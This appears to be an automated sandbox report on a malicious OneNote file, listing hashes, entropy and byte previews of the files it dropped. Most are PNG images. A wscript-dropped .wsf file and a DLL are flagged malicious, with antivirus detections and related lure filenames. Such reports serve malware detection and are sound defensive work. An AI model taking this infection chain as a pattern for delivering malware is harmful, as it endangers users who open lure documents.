                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                          Entropy (8bit):0.32574036610450463
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:Uu5YLys2xX/7Ek3ab+6RKQ137v+uuv8BAN:dGLy7Ba9lL+Rv8s
                                                                                                                                                                                                          MD5:FB0832C9CDE44C7942320AB1FC7295C0
                                                                                                                                                                                                          SHA1:4CBA835708E7B8686DF11198BDFD9889A3F48E63
                                                                                                                                                                                                          SHA-256:914672BDA24130828AEE46F638554536725D3E84302BBB459F160E0DB39BE23A
                                                                                                                                                                                                          SHA-512:E1C3345AEC5F2E043AD0799F8B3FF22A5BC9148BA8011E38F32DCE2905C6BA592AE68D71DB9D1EBE07822444ABFAF63C1C2B63B129319D39BE909679AEE48EE5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.@..`...........................................`.......................................::...............@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1.............................................................eZf..... ......;.X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\click.wsf

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                          Entropy (8bit):2.94770277922009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:tWn:tWn
                                                                                                                                                                                                          MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                                                                                                                          SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                                                                                                                          SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                                                                                                                          SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:badum tss

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):316928
                                                                                                                                                                                                          Entropy (8bit):7.337848702590508
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                                                                                                                          MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                                                                                                                          SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                                                                                                                          SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                                                                                                                          SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                          • Filename: INNOVINC.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_2.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_3.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OMICS_Online_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Omics_Journal.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OMICS.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: 2023-03-16_0923.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{01FA2A3B-858F-4C46-B9FB-5E9682211519}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{043D9B4F-F3B3-4F44-B7FF-6A3353E7E896}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{073CEA82-0D9F-4E5A-B850-E25043267014}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{07B4CB85-5B95-40FC-AD8D-E178B15A7B7E}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{0822903D-0C55-42B1-A3A6-B3098DBBE254}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{08320411-1F96-44AD-8B12-A57532EB515F}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{08603CB1-CF56-4200-A944-1666C7FBE65C}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{09082B7E-8321-4E7A-8B37-5C375C712C54}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{0B6274F1-9C1D-4D80-A204-E60F7A1EE6CF}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{0DAE7727-6F83-4A78-93F1-A097E5AF50A3}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
